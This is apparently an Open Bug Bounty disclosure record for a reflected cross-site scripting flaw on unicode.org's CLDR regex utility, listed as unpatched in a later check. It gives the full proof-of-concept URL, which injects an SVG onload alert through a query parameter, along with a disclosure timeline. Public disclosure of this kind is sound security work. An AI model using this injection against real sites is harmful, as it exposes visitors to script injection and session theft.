unicode.org XSS vulnerability

2015-07-12T23:57:00
ID OBB:71826
Type openbugbounty
Reporter nopernik
Modified 2015-07-12T23:59:00

Description

Vulnerable URL:
http://unicode.org/cldr/utility/regex.jsp?a=\p{Nd}%2B%28%5B%5B%3AWB%3DMB%3A%5D%5B%3AWB%3DMN%3A%5D%5D\p{Nd}%2B%29%3F%22%3E%3Csvg%2Fonload%3Dalert%28%2Fxssposed%2F%29%3E&b;=The+35+quick+brown+fox+jumped+over+1.234+lazy+dogs%3A+1%3A234.
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 38957
Google Pagerank| 7
VIP website status:| Yes
Check unicode.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 12 July, 2015 23:57 GMT
Vulnerability existence verified and confirmed| 12 July, 2015 23:59 GMT